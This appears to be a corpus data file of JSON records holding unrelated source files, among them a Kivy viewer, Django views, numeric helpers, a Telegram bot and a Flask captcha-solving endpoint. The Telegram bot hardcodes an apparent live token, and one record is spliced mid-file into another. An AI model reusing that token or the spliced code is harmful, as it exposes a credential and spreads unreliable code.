ObjectProperty(True)\n text_button_cancel_load = StringProperty(\"Cancel\")\n text_already_loaded = StringProperty(\"Already loaded - {} byte\")\n text_total_size = StringProperty(\"Total size - {} byte\")\n path_to_save_content = StringProperty(\".\")\n full_path_to_load_content = StringProperty(\"data/logo/kivy-icon-24.png\")\n\n def __init__(self, **kwargs):\n super(ImageViewer, self).__init__(**kwargs)\n self.orientation = \"vertical\"\n\n # Бокс для кнопок выбора \"Да-Нет-Отмена\".\n self.box_buttons_select = \\\n BoxLayout(orientation=\"horizontal\", size_hint_y=None, height=40)\n self.body = Popup(title=self.title, title_align=self.title_align,\n background=self.background_image,\n on_dismiss=self.dismiss_callback,\n auto_dismiss=self.auto_dismiss,\n size_hint=self.size_hint)\n self.flag = False\n\n def on_load(self):\n self.flag = True\n\n def create_button(self, name_button):\n \"\"\"\n :type name_button: str;\n\n \"\"\"\n\n button_select = Button(text=name_button, id=name_button)\n button_select.bind(on_press=self.answer_callback)\n self.box_buttons_select.add_widget(button_select)\n\n return True\n\n def show(self, text_button_ok=None, text_button_no=None,\n text_button_cancel=None, auto_dismiss=False,\n title=\"Progress Download:\",\n link=\"http://msg.dimonvideo.ru/sklad/files/1941157/96f_kivy-logo\"\n \"-black-256.png\"):\n \"\"\"\n :type text_button_ok: str;\n :type text_button_no: str;\n :type text_button_cancel: str;\n\n :param link: ссылка для загрузки изображения;\n :param auto_dismiss: автоматическое закрытие окна;\n :param title: подпись окна процесса загрузки;\n\n \"\"\"\n\n def download_cancel(*args):\n setattr(retrieve_progress_load, \"flag\", 0)\n 
progress_load.body.dismiss()\n\n if not os.path.exists(self.path_to_save_content):\n try:\n os.mkdir(self.path_to_save_content)\n except Exception as text_error:\n raise text_error\n\n self.text_button_ok = text_button_ok\n self.text_button_no = text_button_no\n self.text_button_cancel = text_button_cancel\n\n self.full_path_to_load_content = \\\n \"{}/{}\".format(self.path_to_save_content, os.path.split(link)[1])\n\n # If the file already exists, just open it.\n if not os.path.exists(self.full_path_to_load_content):\n progress_load = \\\n ProgressLoad(retrieve_callback=retrieve_progress_load,\n events_callback=download_cancel, title=title,\n text_button_cancel=self.text_button_cancel_load,\n text_already_loaded=self.text_already_loaded,\n text_total_size=self.text_total_size)\n progress_load.show(link, self.full_path_to_load_content,\n self.on_load)\n else:\n self.flag = True\n\n Clock.schedule_interval(self.show_image, 1)\n\n def show_image(self, interval):\n \"\"\"Displays the downloaded image on the screen.\"\"\"\n\n if not self.flag:\n return\n\n image = Image(source=self.full_path_to_load_content)\n button = None\n\n for name_button in [self.text_button_ok, self.text_button_no,\n self.text_button_cancel]:\n if name_button:\n button = self.create_button(name_button)\n if not button:\n self.create_button(\"Yes\")\n\n self.add_widget(image)\n self.add_widget(Widget(size_hint=(None, .03)))\n self.add_widget(SettingSpacer())\n self.add_widget(Widget(size_hint=(None, .03)))\n self.add_widget(self.box_buttons_select)\n\n self.body.content = self\n self.body.open()\n\n Clock.unschedule(self.show_image)\n\n\nif __name__ in (\"__main__\", \"__android__\"):\n from tests import imageviewer\n\n imageviewer.Test(ImageViewer=ImageViewer).run()\n","sub_path":"Libs/uix/imageviewer.py","file_name":"imageviewer.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"578124958","text":"import logging\nimport random\n\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.websocket\n\nlogger = logging.getLogger()\n\n\nclass Table(object):\n def __init__(self):\n self.pid = Table.gen_id()\n self.players = [None, None, None]\n self.state = 0 # 0 waiting 1 playing 2 end 3 closed\n self.pokers = []\n self.multiple = 1\n self.call_score = 0\n self.whoseTurn = 0\n self.last_shot_seat = 0;\n self.last_shot_poker = [];\n self.room = 100\n tornado.ioloop.IOLoop.current().add_callback(self.update)\n\n def calc_coin(self, winner):\n self.state = 2\n coins = []\n tax = 100\n for p in self.players:\n p.ready = False\n coin = self.room * p.rank * self.call_score * self.multiple\n if p.rank == winner.rank:\n coins.append(coin - tax)\n else:\n coins.append(-coin - tax)\n return coins\n\n def update(self):\n logger.info('table[%d] update', self.pid)\n\n def add(self, player):\n for i, p in enumerate(self.players):\n if not p:\n player.seat = i\n self.players[i] = player\n logger.info('Table[%d] add Player[%d]', self.pid, player.pid)\n return True\n logger.error('Player[%d] join a full Table[%d]', player.pid, self.pid)\n return False\n\n def remove(self, player):\n for i, p in enumerate(self.players):\n if p and p.pid == player.pid:\n self.players[i] = None\n else:\n logger.error('Player[%d] not in Table[%d]', player.pid, self.pid)\n\n if all(p == None for p in self.players):\n self.state = 3\n logger.error('Table[%d] close', self.pid)\n return True\n return False\n\n def size(self):\n return 3 - 
self.players.count(None)\n\n def deal_poker(self):\n if not all(p and p.ready for p in self.players):\n return\n\n self.state = 1\n self.pokers = [i for i in range(54)]\n random.shuffle(self.pokers)\n for i in range(51):\n self.players[i % 3].pokers.append(self.pokers.pop())\n\n self.whoseTurn = random.randint(0, 2)\n for p in self.players:\n p.dealPoker()\n\n counter = 0\n\n @classmethod\n def gen_id(cls):\n cls.counter += 1\n return cls.counter\n\n\nif __name__ == '__main__':\n t = Table()\n print(t.pid)\n t = Table()\n print(t.pid)\n t = Table()\n print(t.pid)\n t = Table()\n print(t.pid)\n","sub_path":"server/model/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"190959122","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 12/3/2018 4:23 PM\n# @Author : ZackChao\n# @Site : \n# @File : 二分查找.py\n# @Software: PyCharm\n\n\n\n\n# 10. Find the position of a value inside the interval [a,b] by repeatedly halving it\n# Analysis: find the position of t in L=[a,b]\n\ndef binarySearch(list,item):\n low,hight=0,len(list)-1 # track the head and tail of the interval\n while low<=hight:\n mid=(low+hight)//2 # middle position (integer division so it can be used as an index)\n guess=list[mid]\n if guess>item: # greater than the middle number\n hight=mid -1 # move the tail of the interval to the middle position\n elif guess<item: # less than the middle number\n low=mid+1 # move the head of the interval past the middle position\n else:\n return mid\n return None\n\")\n os.chdir(features_folder)\n current_folder_path, current_folder_name = os.path.split(os.getcwd())\n print(color_text(\"Entered folder \" + current_folder_name, \"blue\"))\n for source_file in glob.glob(\"doc*.txt\"):\n file_basename = source_file[:source_file.index(\".txt\")]\n doc_number = file_basename[4:file_basename.index(\"_features\")]\n rename_name = \"s\" + source_number + \"d\" + doc_number\n if file_basename.endswith(\"features\"):\n os.rename(source_file, rename_name + \".txt\")\n elif file_basename.endswith(\"_add_1\"):\n os.rename(source_file, rename_name + \"_1.txt\")\n elif file_basename.endswith(\"_add_2\"):\n os.rename(source_file, rename_name + \"_2.txt\")\n os.chdir(\"../..\")\n current_folder_path, current_folder_name = os.path.split(os.getcwd())\n print(color_text(\"Exited to \" + current_folder_name, \"pink\"))\n print('---------------------------------------------------------------------\\n')\n# - entry point\nif __name__ == \"__main__\":\n sources_folder = \"classifiers/data_test\" # change main folder name here\n features_folder = \"features\"\n print(color_text(\"starting...\", \"green\"))\n sources_sub_folders = next(os.walk(sources_folder))[1]\n os.chdir(sources_folder)\n for folder_name in sources_sub_folders:\n rename_files_in_folder(folder_name, features_folder)\n print(color_text('...done', \"green\"))\n quit()\n","sub_path":"rename_classifiers.py","file_name":"rename_classifiers.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"139648575","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom .forms import ContactForm\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .models import Service, Manager\n# Create your views here.\n\n\nclass HomeView(View):\n template_name = \"index.html\"\n form_class = ContactForm\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form':form})\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n Name = form.cleaned_data['Name']\n Email = form.cleaned_data['Email']\n Subject = form.cleaned_data['Subject']\n Message = form.cleaned_data['Message']\n contact = form.save()\n 
return HttpResponse('hello')\n return render(request, self.template_name, {'form':form})\n\n\ndef Index(request):\n if request.method == 'GET':\n form = ContactForm()\n else:\n form = ContactForm(request.POST)\n if form.is_valid():\n contact = form.save()\n Name = form.cleaned_data['Name']\n Email = form.cleaned_data['Email']\n Subject = form.cleaned_data['Subject']\n Message = form.cleaned_data['Message']\n contact.save()\n return HttpResponse('')\n data = {'call':Service.objects.all , 'man':Manager.objects.all() ,'form':form}\n return render(request , 'index.html' , data)\n\n\n","sub_path":"jicommit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"79595587","text":"from numpy import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import ensemble, linear_model\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport itertools\n\n\n# Set params\nyear_start = 2019\nweek_start = 10\n\n# Read in data\nreal_df = pd.read_csv(f'Output/{year_start}_real.csv', header=0)\nproj_df = pd.read_csv(f'Output/{year_start}_projected.csv', header=0)\nall_hierarchies = list(sort(list(set(proj_df['hierarchy'].values))))\nmetric_list = list(set(proj_df['metric'].values))\n\n# Remove all data that was used in training the model (data before the year-week start).\nproj_df = proj_df[(52*proj_df['year']+proj_df['week_num']) >= (52*year_start+week_start)]\n\n# Iterate through each hierarchy, aggregate projections across all stores, and compare against\n# the aggregation of the observed data.\nmodel_evaluation = pd.DataFrame(columns=['year','hierarchy','metric','avg_weekly_value','avg_weekly_projected_value','projection_RMSE','avg_weekly_percent_err'])\ndf_row = 0 \nfor k in range(len(all_hierarchies)):\n\tcurrent_hierarchy = all_hierarchies[k]\n\tcurrent_real_df = real_df[real_df['hierarchy'] == current_hierarchy]\n\tcurrent_proj_df = proj_df[proj_df['hierarchy'] == current_hierarchy]\n\tcombined_df = pd.merge(current_real_df,current_proj_df, on=['year','week_num','store_id','metric']).groupby(['year','week_num','metric']).sum()[['value','projected_value']]\n\tcombined_df = combined_df.reset_index().sort_values(['metric','year','week_num'])\n\n\tfor i in range(len(metric_list)):\n\t\tmetric = metric_list[i]\n\t\tcombined_df_metric = combined_df[combined_df['metric']==metric]\n\t\tmetric_real = combined_df_metric['value'].mean()\n\t\tmetric_proj = combined_df_metric['projected_value'].mean()\n\t\tmetric_RMSE = sqrt(sum((combined_df_metric['projected_value'].values-combined_df_metric['value'].values)**2))\n\t\tmetric_prcnt_err = 100*median(abs((combined_df_metric['projected_value'].values-combined_df_metric['value'].values)/combined_df_metric['value'].values))\n\t\tmodel_evaluation.loc[df_row] = [year_start,current_hierarchy,metric,metric_real,metric_proj,metric_RMSE,metric_prcnt_err]\n\t\tdf_row += 1\n\n\nmodel_evaluation.to_csv(f'Output/{year_start}_projection_errors.csv', header=True, index=False)\n\n\n","sub_path":"evaluate_model_errors.py","file_name":"evaluate_model_errors.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"355304628","text":"##recursive\ndef rgcd(a,b):\n    if b == 0:\n        return abs(a)\n    else:\n        return rgcd(abs(b), abs(a) % abs(b))\n\ndef rxgcd(a,b):\n    if b == 0:\n        return (abs(a),abs(a)//a,0)\n    else:\n        (g,u,v) = rxgcd(b, a % b)\n        return (g, v, 
u-(a//b)*v)\n\n##iterative\ndef gcd(a,b):\n    while b != 0:\n        a, b = b, a % b\n    return a # when b = 0, gcd(a,b) = a\n\ndef xgcd(a,b):\n    prevu, u = 1, 0\n    prevv, v = 0, 1\n    while b != 0:\n        q = a//b\n        u, prevu = prevu - q*u, u\n        v, prevv = prevv - q*v, v\n        a, b = b, a % b\n    return (a, prevu, prevv)","sub_path":"misc/helper-functions.py","file_name":"helper-functions.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"464795608","text":"import numpy as np\n\n\ndef conjugate_gradient(A, b, x0=None, accuracy=1e-5, iterations=10000):\n    \"\"\"\n    Solve Ax = b with conjugate gradient method\n    :param A: 2d array\n    :param b: 1d array\n    :param x0: 1d array, initial point\n    :param accuracy: answer accuracy\n    :param iterations: maximum number of iterations\n    :return: 1d array of x, such that Ax = b\n    \"\"\"\n    n = len(b)\n    if x0 is None:  # explicit None check: the truth value of a NumPy array is ambiguous\n        x0 = np.ones(n)\n    r = b - np.dot(A, x0)\n    z = r\n    r2 = np.dot(r, r)\n    for i in range(0, iterations):\n        Az = np.dot(A, z)\n        alpha = r2 / np.dot(Az, z)\n        x0 += alpha * z\n        r -= alpha * Az\n        r2_new = np.dot(r, r)\n        beta = r2_new / r2\n        r2 = r2_new\n        if r2_new < accuracy:\n            break\n        z = r + beta * z\n    return x0\n","sub_path":"conjugate_gradient_method.py","file_name":"conjugate_gradient_method.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"373124436","text":"the_count = [1, 2, 3, 4, 5]\r\nfruits = ['apples', 'oranges', 'pears', 'apricots']\r\nchange = [1, 'pennies', 2, 'dimes', 3, 'quarters']\r\n\r\n# this first kind of for-loop goes through a list\r\nfor number in the_count:\r\n    print(f\"This is count {number}\")\r\n\r\n# same as above\r\nfor fruit in fruits:\r\n    print(f\"A fruit of type: {fruit}\")\r\n\r\n# also we can go through mixed lists too\r\n# notice we have to use {} since we don't know what's in it\r\nfor i in change:\r\n    print(f\"I got {i}\")\r\n\r\n# we can also build lists, first start with an empty one\r\nelements = []\r\n\r\n# then use the range function to do 0 to 5 counts\r\nfor i in range(0, 6):\r\n    print(f\"Adding {i} to the list.\")\r\n    # append is a function that lists understand\r\n    elements.append(i)\r\n\r\n# now we can print them out too\r\nfor i in elements:\r\n    print(f\"Element was: {i}\")\r\n\r\n\r\n# Study Drills\r\n# 1. Take a look at how you used range. What does it do?\r\n# range generates a list of integers from the first argument to the second argument.\r\n\r\n# 2. Could you have avoided that for-loop entirely on line 22 and just assigned range(0,6) directly to elements\r\n# Depends on what you want elements for. In the case of using it as a for loop array, either works.\r\nelements2 = range(0, 6)\r\nprint(\"Type of original elements: \", type(elements))\r\nprint(\"Type of test elements: \", type(elements2))\r\n\r\nfor i in elements2:\r\n    print(f\"Element was: {i}\")\r\n\r\n# 3. Find the Python documentation on lists and read about them. 
What other operations can you do to lists besides append?\r\n# Remove elements, sort them, search them.","sub_path":"Assignment3/Assignment3/ex32.py","file_name":"ex32.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38695374","text":"import pandas\n\nhand = pandas.read_csv(\"/Users/kaxil/Desktop/Royal Holloway/Kaggle/Digit Recognition/train.csv\")\ntrain= hand.iloc[0:28000,:]\ntest= hand.iloc[28000:420001,:]\n#print(hand.head(5))\n\n# Using Cross Validation \nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import cross_validation\n\nalg = RandomForestClassifier(random_state=1,n_estimators=600, min_samples_split=2, min_samples_leaf=2)\nscores = cross_validation.cross_val_score(alg, train.iloc[:,1:786],train[\"label\"],cv=5)\nprint(scores.mean()) \n\nalg.fit(train.iloc[:,1:786],train[\"label\"])\npredictions = alg.predict(test.iloc[:,1:786])\n\n# Calculating the accuracy of the Test Set\nfrom sklearn.metrics import accuracy_score\naccuracy_score(test.iloc[:,0],predictions)\n\n# Now predicting on Real Test Set\nreal_test = pandas.read_csv(\"/Users/kaxil/Desktop/Royal Holloway/Kaggle/Digit Recognition/test.csv\")\nr_predictions = alg.predict(real_test)\n\nsubmission = pandas.DataFrame({\n \"ImageId\": range(1,28001,1),\n \"Label\": r_predictions\n })\nsubmission.to_csv(\"/Users/kaxil/Desktop/kaggle.csv\", index=False)\n\n# Score on Kaggle : 0.96214\n","sub_path":"digit_recognizer.py","file_name":"digit_recognizer.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"362021908","text":"import numpy\r\nimport pandas as pd\r\nimport Calculations\r\nimport unittest\r\n\r\n#contains trips for the following locationID-> locationID\r\n#1->2\r\n#3->3\r\n#4->5\r\n#5->4\r\nclass Test_Equations(unittest.TestCase):\r\n\r\n def test_self(self): \r\n\r\n zonedf = pd.read_csv(r\"C:\\Users\\nick\\Documents\\GitHub\\NYC-Taxi-Tips\\mock_zones.csv\")\r\n y_datadf = pd.read_csv(r\"C:\\Users\\nick\\Documents\\GitHub\\NYC-Taxi-Tips\\mock_yellow_data.csv\")\r\n \r\n # test converting Borough name to zones\r\n zone_id_dict = Calculations.init_zone_dict(zonedf)\r\n zone_list = Calculations.convert_zone_ID(zone_id_dict, \"Cat\")\r\n \r\n # data contains two zone IDs of 2 and 3\r\n self.assertTrue(zone_list == [2, 3])\r\n\r\n # test converting Borough name to zones\r\n zone_id_dict = Calculations.init_zone_dict(zonedf)\r\n zone_list = Calculations.convert_zone_ID(zone_id_dict, \"Dog\")\r\n #data contains zone ID of 1\r\n self.assertTrue(zone_list == [1, 5])\r\n\r\n # Tests to complete at later time\r\n #test computing an average cost between Boroughs, using all three transport methods\r\n #data contains two costs of 10 and 20. 
There is only one transit method\r\n # y_dict = Calculations.calc_dict_costs(y_datadf, \"Dog\", \"Cat\")\r\n # y_cost = Calculations.compute_one_method_cost(\"Dog\", \"Cat\", zone_id_dict, y_dict)\r\n #self.assertTrue(Calculations.compute_avg_cost(\"Dog\", \"Cat\") == 15)\r\n #test computing an average cost between Boroughs, using only one transport method\r\n #data contains one data piece where cost is 25\r\n #self.assertTrue(Calculations.compute_one_method_cost(\"Fish\", \"Dog\", datadf) == 25)\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n\r\n\r\n","sub_path":"Test_Equations.py","file_name":"Test_Equations.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"99119772","text":"#!/usr/bin/python3\nimport requests\nimport swiftclient\nimport json\nimport d3n.config as cfg\nimport math\nfrom colorama import Fore, Style\n\nclass ObjectStore():\n def __init__(self):\n self.conn = None #self.connect_swift();\n self.token = None #self.get_token();\n self.metadata = {}\n pass\n\n def connect_swift(self):\n url = 'http://%s:%d/auth/1.0' % (cfg.rgw_host, cfg.rgw_port)\n conn = swiftclient.Connection(\n user=cfg.swift_user,\n key=cfg.swift_key,\n authurl=url)\n return conn;\n\n def get_token(self):\n token = self.conn.get_auth()[1]\n return token;\n\n def add_to_metadata_tree(self, metadata, name, size):\n path_element = name.split('/')\n meta_ptr = metadata\n for element in path_element:\n if element not in meta_ptr:\n meta_ptr[element] = {'objs': {}, 'size': 0}\n meta_ptr[element]['size'] += size\n meta_ptr = meta_ptr[element]['objs']\n\n def load_metadata(self):\n metadata = {}\n return metadata\n metadata_swift = self.conn.get_container(cfg.bucket_name)[1]\n for data in metadata_swift:\n full_name = data['name'];\n\n if full_name.endswith('_SUCCESS'): continue;\n self.add_to_metadata_tree(metadata, data['name'], data['bytes'])\n self.metadata = metadata\n return metadata\n\n def clear_cache(self):\n token = self.get_token()\n print('Clear the cache')\n url = 'http://%s:%d/swift/v1/' % (cfg.rgw_host, cfg.rgw_port)\n headers = {\"KARIZ_FLUSH_CACHE\": \"1\",\n \"X-Auth-Token\": token}\n\n r = requests.delete(url, headers=headers)\n\n def fetch_object_partial(self, bucket_name, obj_name, ofs_s, ofs_e):\n url = 'http://%s:%d/swift/v1/%s/%s' % (cfg.rgw_host, cfg.rgw_port, bucket_name, obj_name)\n headers = {\"range\": \"bytes=%d-%d\" % (ofs_s, ofs_e),\n \"X-Auth-Token\": self.token}\n r = requests.get(url, headers=headers)\n\n if r.status_code not in [200, 201, 204, 206]:\n raise NameError(Fore.LIGHTRED_EX + '\\t\\tPrefetch %s/%s %d-%d, failed with statuscode: %d'%(bucket_name, obj_name, ofs_s, ofs_e, r.status_code) + Style.RESET_ALL )\n\n def prefetch_dataset_stride(self, path, wave=-1, stride=0):\n cache_block_size = 4194304 # 4 MB\n path_element = path.split('/')\n meta_ptr = self.metadata\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n meta_ptr = meta_ptr[element]['objs']\n for obj in meta_ptr:\n n_cache_blocks = meta_ptr[obj]['size'] // cfg.cache_block_size\n ofs_s = (n_cache_blocks - stride) * cfg.cache_block_size if (stride != -1) else 0\n ofs_e = meta_ptr[obj]['size']\n self.fetch_object_partial(bucket_name=cfg.bucket_name, obj_name=path + '/' + obj, ofs_s=ofs_s, ofs_e=ofs_e)\n\n def prefetch_s3_dataset(self, path, yarn_map_byte, stride=0):\n if not path.startswith('s3a'):\n raise NameError('%s is not a valid s3 
path'%(path))\n print(Fore.YELLOW, '\\tPrefetch %s, stride %d'%(path, stride), Style.RESET_ALL)\n #self.prefetch_dataset_map_stride(path.split(cfg.bucket_name+'/', 1)[1], yarn_map_byte, stridereturn )\n return self.prefetch_dataset_pstride(path.split(cfg.bucket_name+'/', 1)[1], yarn_map_byte, stride)\n\n\n\n def prefetch_dataset_pstride(self, path, yarn_map_byte, stride=0):\n cache_block_size = 4194304 # 4 MB\n path_element = path.split('/')\n meta_ptr = self.metadata\n root_dir_size = 0\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n root_dir_size = meta_ptr[element]['size']\n meta_ptr = meta_ptr[element]['objs']\n\n n_tobe_prefetched_blocks = (root_dir_size*stride)//(cache_block_size*100)\n request_blocks = n_tobe_prefetched_blocks\n for obj in meta_ptr:\n n_maps = math.ceil(meta_ptr[obj]['size'] / yarn_map_byte) if meta_ptr[obj]['size'] > yarn_map_byte else 1\n map_byte = yarn_map_byte if meta_ptr[obj]['size'] > yarn_map_byte else meta_ptr[obj]['size']\n\n if n_tobe_prefetched_blocks == 0 or map_byte < cache_block_size:\n break;\n\n for i in range(0, n_maps):\n n_cache_blocks = map_byte // cfg.cache_block_size\n \n if n_cache_blocks > n_tobe_prefetched_blocks:\n n_cache_blocks = n_tobe_prefetched_blocks\n \n n_tobe_prefetched_blocks -= n_cache_blocks\n\n ofs_s = i*map_byte\n ofs_e = i*map_byte + n_cache_blocks*cfg.cache_block_size \n\n self.fetch_object_partial(bucket_name=cfg.bucket_name, \n obj_name=path + '/' + obj, ofs_s=ofs_s, ofs_e=ofs_e)\n\n print(Fore.LIGHTYELLOW_EX, '\\t\\ttotal cache blocks in %s is %d, requested: %d, prefetched: %d'%(path,\n root_dir_size//cache_block_size, request_blocks, (request_blocks - n_tobe_prefetched_blocks)), Style.RESET_ALL)\n return path, request_blocks, (request_blocks - n_tobe_prefetched_blocks)\n\n\n\n\n\n\n def prefetch_dataset_map_stride(self, path, yarn_map_byte, stride=0):\n cache_block_size = 4194304 # 4 MB\n path_element = path.split('/')\n meta_ptr = self.metadata\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n meta_ptr = meta_ptr[element]['objs']\n for obj in meta_ptr:\n n_maps = math.ceil(meta_ptr[obj]['size'] / yarn_map_byte) if meta_ptr[obj]['size'] > yarn_map_byte else 1\n\n map_byte = yarn_map_byte if meta_ptr[obj]['size'] > yarn_map_byte else meta_ptr[obj]['size']\n\n for i in range(0, n_maps):\n n_cache_blocks = map_byte // cfg.cache_block_size\n if n_cache_blocks < stride:\n n_cache_blocks = stride\n\n ofs_s = i * map_byte + (n_cache_blocks - stride) * cfg.cache_block_size if (\n stride != -1) else i * map_byte\n if ofs_s > meta_ptr[obj]['size']:\n ofs_s = i * map_byte\n\n ofs_e = (i + 1) * map_byte if ((i + 1) * map_byte < meta_ptr[obj]['size']) else meta_ptr[obj]['size']\n self.fetch_object_partial(bucket_name=cfg.bucket_name, obj_name=path + '/' + obj, ofs_s=ofs_s,\n ofs_e=ofs_e)\n\n def get_dataset_metadata(self, path, wave=-1, stride=0):\n path_element = path.split('/')\n meta_ptr = self.metadata\n for element in path_element:\n if element not in meta_ptr:\n return -1; # means could not prefetch this input\n meta_ptr = meta_ptr[element]['objs']\n return meta_ptr\n","sub_path":"code/d3n/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625277822","text":"import telebot\n\nTOKEN = \"1120903746:AAEqlzOT0E9YsCKr0N7-er3JbgS94YztTfQ\"\nbot = 
telebot.TeleBot(TOKEN)\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n    keyboard = telebot.types.ReplyKeyboardMarkup(True)\n    keyboard.row('about us', 'donations')\n    bot.send_message(message.chat.id, 'hello! here you can record or leave your voice!', reply_markup=keyboard)\n\n\n@bot.message_handler(content_types=['text'])\ndef text_handler(message):\n    text = message.text.lower()\n    chat_id = message.chat.id\n    if text == \"about us\":\n        bot.send_message(chat_id,\n                         'we are a collection of proactive people who believe in the future and the development of AI '\n                         '. your voices that you leave here will help the creators of voice assistants, synthesizers. '\n                         'who knows, maybe in a year we will tell our amazing story in YOUR VOICE')\n    elif text == \"donations\":\n        bot.send_message(chat_id, 'https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=2JVSCG6WL7XBW')\n    else:\n        bot.send_message(message.chat.id, \"just send me your voice\")\n\n\n@bot.message_handler(content_types=['voice', 'audio'])\ndef voice_handler(message):\n    chat_id = message.chat.id\n    bot.send_message(chat_id, \"thanks a lot, you also can send me more voices!\")\n    print('+1')\n\n\nbot.polling()\n","sub_path":"Новая папка (2)/teleg/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"374811567","text":"parents = {}\nroots = {}\n\ndef find_roots(parents, person):\n    # walk up until we reach a root (marked with parent -1)\n    root = person\n    while parents[root] != -1:\n        root = parents[root]\n    # path compression: point every node on the path directly at the root\n    p = person\n    while p != root:\n        parent = parents[p]\n        parents[p] = root\n        p = parent\n    return root\nmaxs = 1\nfor i in range(int(input())):\n    l, r = [int(x) for x in input().split()]\n    if l not in parents:\n        parents[l] = -1\n        roots[l] = 1\n    if r not in parents:\n        parents[r] = -1\n        roots[r] = 1\n    # print(parents, roots) # debug\n    rootl = find_roots(parents, l)\n    rootr = find_roots(parents, r)\n    # print(rootl, rootr) # debug\n    if rootl != rootr:\n        parents[rootl] = rootr\n        roots[rootr] = roots[rootr] + roots[rootl]\n        del roots[rootl]\n        maxs = max(maxs, roots[rootr])\n    # report the size of the largest circle after every query\n    result = maxs\n    print(result)\n\n","sub_path":"Hackerrank/InterviewKit/friend_circle_quaries.py","file_name":"friend_circle_quaries.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"615615327","text":"# coding: utf-8\r\n\"\"\"\r\npython: 3.6\r\nflask: 1.0.2\r\n\"\"\"\r\nfrom PIL import Image\r\nfrom flask import Flask\r\nfrom werkzeug.contrib.fixers import ProxyFix\r\nfrom flask import request, jsonify, render_template, redirect\r\nfrom config import *\r\nfrom predict import predict\r\n\r\nprint = logger.info\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/GetCaptcha', methods=[\"POST\"])\r\ndef locate():\r\n    if request.method == \"POST\":\r\n        img = request.files['img']\r\n        img_path = os.path.join(IMAGE_DIR, CAPTCHA_NAME)\r\n        img.save(img_path)\r\n        captcha_input = predict(img_path)\r\n        return jsonify({\r\n            'Captcha': captcha_input,\r\n            'Message': '',\r\n            'Success': True,\r\n        })\r\n    else:\r\n        return jsonify({\r\n            'Captcha': '',\r\n            'Message': 'request method error',\r\n            'Success': False,\r\n        })\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.wsgi_app = ProxyFix(app.wsgi_app)\r\n    # the Guangwai linux box uses port 38015, the Hebei linux box uses port 7101; external access uses the same port\r\n    app.run(host='0.0.0.0', port=7101, 
threaded=True)\r\n","sub_path":"项目代码/linux代码/SougouVerifycode/run_captcha.py","file_name":"run_captcha.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"130739738","text":"__author__ = 'kyota'\n\nimport numpy as np\nimport math\nimport cv2\n\nclass SKEL:\n def __init__(self, file_name):\n # print 'construct skel'\n self.vertices = np.ndarray((0,4))\n self.projected_vertices = np.ndarray((0,3))\n self.lines = np.ndarray((0,4))\n self.matrix = np.ndarray((4,4))\n\n file = open(file_name, \"r\")\n file.close\n lines = file.readlines()\n arr = []\n row = 0\n v_num = 0\n p_num = 0\n # for i in range(0, len(lines)):\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n _arr = line.split(\" \")\n if _arr.__contains__(''):\n _arr.remove('')\n if _arr[0].__contains__(\"#\"):\n # print 'skip'\n continue\n row += 1\n if row == 1:\n type = _arr[0]\n if row == 2:\n v_num = int(_arr[0])\n p_num = int(_arr[1])\n if row > 2 and row <= 2 + v_num:\n _arr = map(int, _arr)\n self.vertices = np.concatenate((self.vertices, [_arr]), axis=0)\n if row > 2+v_num and row <= 2+v_num+p_num:\n _arr = map(int, _arr)\n self.lines = np.concatenate((self.lines, [_arr]), axis=0)\n\n def set_matrix(self, matrix):\n self.matrix = matrix\n\n def transform(self, T):\n # print len(self.vertices)\n for i in range(0, len(self.vertices)):\n self.vertices[i] = np.dot(T, self.vertices[i])\n\nif __name__ == \"__main__\":\n skel 